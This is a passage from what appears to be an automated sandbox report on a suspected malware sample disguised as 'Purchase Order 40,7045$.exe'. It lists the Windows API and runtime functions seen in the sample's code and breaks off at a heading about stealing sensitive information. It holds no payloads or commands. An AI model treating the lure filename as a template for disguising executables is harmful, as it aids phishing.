_getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 0_2_013E7280
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 0_2_013E8AD0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, 0_2_013DECBB
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 0_2_013E873D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 0_2_013E87E4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_013E8648
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 0_2_013E7EDC
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013DC26F GetSystemTimeAsFileTime,__aulldiv, 0_2_013DC26F

Stealing of Sensitive Information: